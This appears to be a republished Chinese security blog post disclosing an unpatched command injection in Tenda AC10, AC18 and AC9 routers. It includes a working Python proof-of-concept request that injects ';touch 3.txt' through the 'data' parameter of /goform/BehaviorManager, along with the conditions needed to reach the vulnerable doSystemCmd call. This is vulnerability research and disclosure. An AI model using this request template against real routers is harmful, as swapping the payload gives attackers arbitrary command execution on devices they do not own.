文章总结： 本文披露腾达路由器AC10等型号存在命令注入零日漏洞，位于formBehaviorManager函数。攻击者构造特定请求使data参数拼接至doSystemCmd函数，可致任意命令执行。文章详述了IDA分析与QEMU复现过程并提供POC代码，验证了漏洞有效性，建议厂商及时修复。 综合评分： 85 文章分类： 漏洞分析,漏洞POC,IoT安全,网络安全,Web安全

[零日全网首发!]腾达路由器命令注入

原创

静师傅

安静安全

2025年12月30日 22:06 广东

点击上方蓝色字体关注我们

影响版本

只测试了AC10、AC18、AC9(其他版本可能也存在)

包零日，想要的师傅可以提交CVE(day太多不想写)

POC

import requestsip = "IP:PORT"url = f"http://{ip}/goform/BehaviorManager"data = {  "modulename": "macfilter",     "option": "add",     "switch": "0",    "data": ";touch 3.txt"}response = requests.post(url, data=data)

漏洞分析

通过binwalk去提取路由器固件系统，IDA分析httpd

该命令注入漏洞位于formBehaviorManager函数

由于data参数存在命令注入漏洞，参数data直接拼接给doSystemCmd函数，导致任意命令注入。

这里我们选择进入第一个分支，满足的条件如下:

mdname必须是以下四个值之一：

macfilter

ipmacbind

accountfilter

qosrule

global_switch不能等于”1″

option不是clear、show、update即可

安装qemu工具模拟路由器固件环境，执行完POC效果是无回显的噢!

END

#

安静安全交流群

点个在看你最好看

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安静安全 静师傅《[零日全网首发!]腾达路由器命令注入》